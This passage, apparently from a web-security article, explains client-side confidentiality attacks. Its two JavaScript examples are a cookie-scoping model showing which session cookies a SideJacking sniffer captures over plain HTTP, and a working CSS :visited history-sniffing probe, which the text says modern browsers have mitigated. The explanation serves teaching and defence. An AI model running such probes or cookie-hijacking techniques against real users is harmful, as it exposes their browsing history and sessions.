Confidentiality impact
The attacks described in this section are all concerned with accessing confidential information on the client side. I look at cookie, history, file and clipboard stealing attacks, as well as attacks that obtain information about the topology of a protected internal network, and at phishing.
Cookies are pieces of data sent by the server to be stored on the client and returned on later requests. They are primarily used to track a client across multiple request/response cycles. Cookies are scoped by domain (and path) rather than by strict origin: a browser only sends a cookie back to hosts that match the domain it was set for, so a web server cannot read cookies belonging to other domains. Note that this scoping is looser than the same-origin policy; unless a cookie carries the Secure attribute, a plain http:// request to a matching host receives the same cookie as an https:// one. Cookies themselves are not likely to represent an attack vector against the web client. However, they are a high-value target for attackers: a cookie whose purpose is to identify the client helps an attacker hijack a session and impersonate that client. Web mail clients, for instance, use cookies to identify a user on later visits so that the user does not have to provide credentials each time they access their mail. If an attacker can obtain the cookie, unauthorized access to the mail account follows, as demonstrated recently by Perry at Defcon and by Graham with SideJacking using Hamster.
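The following is an added example, not code from the original article, showing how cookie scoping decides which cookies leak in a SideJacking scenario. It implements the RFC 6265 domain-match and path-match rules in a tiny cookie jar and applies the Secure and HttpOnly attributes; the hostnames, cookie names and values are constructed for illustration.

```javascript
// Added example (not from the original article): a minimal cookie jar that
// applies the RFC 6265 domain-match, path-match, Secure and HttpOnly rules,
// used to show which cookies a SideJacking sniffer sees.
// Hostnames, cookie names and values are constructed for illustration.

// RFC 6265 section 5.1.3: the host equals the cookie domain or ends in "." + domain.
function domainMatches(host, cookieDomain) {
  host = host.toLowerCase();
  cookieDomain = cookieDomain.toLowerCase();
  return host === cookieDomain || host.endsWith("." + cookieDomain);
}

// RFC 6265 section 5.1.4: the request path equals the cookie path, or the
// cookie path is a prefix that ends in "/" or is followed by "/" in the request path.
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || requestPath[cookiePath.length] === "/";
}

// Cookies the browser attaches to a request for `url`. Note what is NOT
// checked: the port, and the scheme except through the Secure attribute.
// Cookie scope is domain/path based, looser than the same-origin policy.
function cookiesSentTo(jar, url) {
  const u = new URL(url);
  return jar.filter(c =>
    (c.hostOnly ? u.hostname === c.domain : domainMatches(u.hostname, c.domain)) &&
    pathMatches(u.pathname, c.path) &&
    (!c.secure || u.protocol === "https:"));
}

// Cookies readable through document.cookie by script running at `url`.
function cookiesVisibleToScript(jar, url) {
  return cookiesSentTo(jar, url).filter(c => !c.httpOnly);
}

// Constructed jar after a login at https://mail.example.test. SESSID is the
// session cookie; it is HttpOnly but was set without the Secure attribute.
const jar = [
  { name: "SESSID", value: "0123abcd", domain: "example.test",      hostOnly: false, path: "/", secure: false, httpOnly: true  },
  { name: "pref",   value: "en",       domain: "mail.example.test", hostOnly: true,  path: "/", secure: false, httpOnly: false },
  { name: "SAFE",   value: "c0ffee",   domain: "example.test",      hostOnly: false, path: "/", secure: true,  httpOnly: true  },
];

// SideJacking: the victim's browser fetches any http:// resource on the
// domain (an image, a redirect) over an open wireless network; the session
// cookie goes out in the clear and Hamster-style tools replay it.
function sidejackingLeak() {
  return cookiesSentTo(jar, "http://mail.example.test/logo.png").map(c => c.name);
}
// -> ["SESSID", "pref"]; SAFE is withheld because it is Secure-only.

// An XSS payload on the mail site cannot read SESSID (HttpOnly)...
function xssVisible() {
  return cookiesVisibleToScript(jar, "https://mail.example.test/inbox").map(c => c.name);
}
// -> ["pref"]; but HttpOnly does nothing against a sniffer, only Secure does.

console.log("sent in clear:", sidejackingLeak(), "visible to script:", xssVisible());
```

The point the example makes: HttpOnly keeps SESSID out of document.cookie, but only the Secure attribute keeps it off the wire when the victim's browser fetches any http:// resource on a matching domain, which is exactly the request a sidejacking tool waits for.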
The browser history and the browser cache are other confidential pieces of information an attacker can gain access to. As a user visits web pages, the browser records them in its cache and its history. If an attacker can read the cache or history, information such as which email service or bank the user uses can be inferred and used in subsequent attacks, such as phishing and cookie stealing. Cache contents and browser history can be obtained via browser vulnerabilities, JavaScript, CSS, inspection of visited-link color and timing attacks (see, for example, Grossman's post "I know where you've been").
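As an added example that is not part of the original article, here is the visited-link colour probe in the form Grossman's post describes: the page styles a:visited distinctly, creates a link for each candidate URL and reads the computed colour back. The `document` and `getComputedStyle` objects are passed in as parameters so the detection logic can be exercised outside a browser; the candidate URL list and the hostnames in it are constructed.

```javascript
// Added example (not from the original article): CSS :visited colour probe
// of the kind described in Grossman's "I know where you've been".
// `doc` and `getStyle` (document and window.getComputedStyle) are injected
// so the logic can be exercised without a browser. Candidate URLs are constructed.

const VISITED_COLOR = "rgb(255, 0, 0)";   // colour the probe page gives a.probe:visited
const UNVISITED_COLOR = "rgb(0, 0, 255)"; // colour of an unvisited a.probe

// Install the two style rules the probe relies on.
function installProbeStyle(doc) {
  const style = doc.createElement("style");
  style.textContent =
    "a.probe { color: " + UNVISITED_COLOR + "; }" +
    "a.probe:visited { color: " + VISITED_COLOR + "; }";
  doc.head.appendChild(style);
  return style;
}

// Create one link per candidate URL, read its computed colour and report
// the URLs whose link took the :visited colour.
function sniffVisited(candidates, doc, getStyle) {
  const container = doc.createElement("div");
  container.style.position = "absolute";  // keep the probe links off-screen
  container.style.left = "-9999px";
  doc.body.appendChild(container);

  const hits = [];
  for (const url of candidates) {
    const a = doc.createElement("a");
    a.className = "probe";
    a.href = url;
    a.textContent = url;
    container.appendChild(a);
    if (getStyle(a).color === VISITED_COLOR) hits.push(url);
  }
  container.remove();
  return hits;
}

// Browser usage: run the probe against a constructed list of candidate sites.
// Outside a browser (no document) this part is skipped.
if (typeof document !== "undefined" && typeof getComputedStyle !== "undefined") {
  const candidates = [
    "https://mail.example.test/",
    "https://bank.example.test/",
    "https://webmail.example.test/",
  ];
  installProbeStyle(document);
  // An attacker-controlled page would exfiltrate this list; here it is only logged.
  console.log("visited:", sniffVisited(candidates, document, getComputedStyle));
}
```

A caveat for anyone reproducing this today: Firefox 4 and contemporary Chrome releases (2010-2011) adopted David Baron's fix, under which getComputedStyle returns the unvisited style for :visited links, so this probe now reports nothing; the timing-based variants the text mentions were the response to that mitigation. The probe still shows what the :visited selector leaked and why the fix had to change what the DOM reports rather than CSS itself.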